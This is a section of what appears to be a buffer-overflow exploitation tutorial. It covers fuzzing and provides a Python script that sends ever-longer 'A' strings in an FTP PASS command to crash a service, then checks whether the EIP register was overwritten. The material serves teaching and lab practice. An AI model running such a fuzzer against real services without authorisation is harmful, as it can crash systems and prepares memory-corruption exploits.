# 4. Fuzzing

The following Python script can be modified and used to fuzz remote entry points to an application. It will send increasingly long buffer strings in the hope that one eventually crashes the application.

```python
import socket, time, sys

ip = "10.0.0.1"
port = 21
timeout = 5

# Create an array of increasing length buffer strings.
buffer = []
counter = 100
while len(buffer) < 30:
	buffer.append("A" * counter)
	counter += 100

for string in buffer:
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.settimeout(timeout)
		connect = s.connect((ip, port))
		s.recv(1024)
		s.send("USER username\r\n")
		s.recv(1024)

		print("Fuzzing PASS with %s bytes" % len(string))
		s.send("PASS " + string + "\r\n")
		s.recv(1024)
		s.send("QUIT\r\n")
		s.recv(1024)
		s.close()
	except:
		print("Could not connect to " + ip + ":" + str(port))
		sys.exit(0)
	time.sleep(1)
```

Note that, we need to change `send` command to the command that we spiked and its format will be identified by seeing the `EAX` register in the previous step (spiking). Also add or remove `recv` commands according to the messages that the commands send

Finally run this script and check that the EIP register has been overwritten by A's (\x41). Make a note of any other registers that have either been overwritten, or are pointing to space in memory which has been overwritten.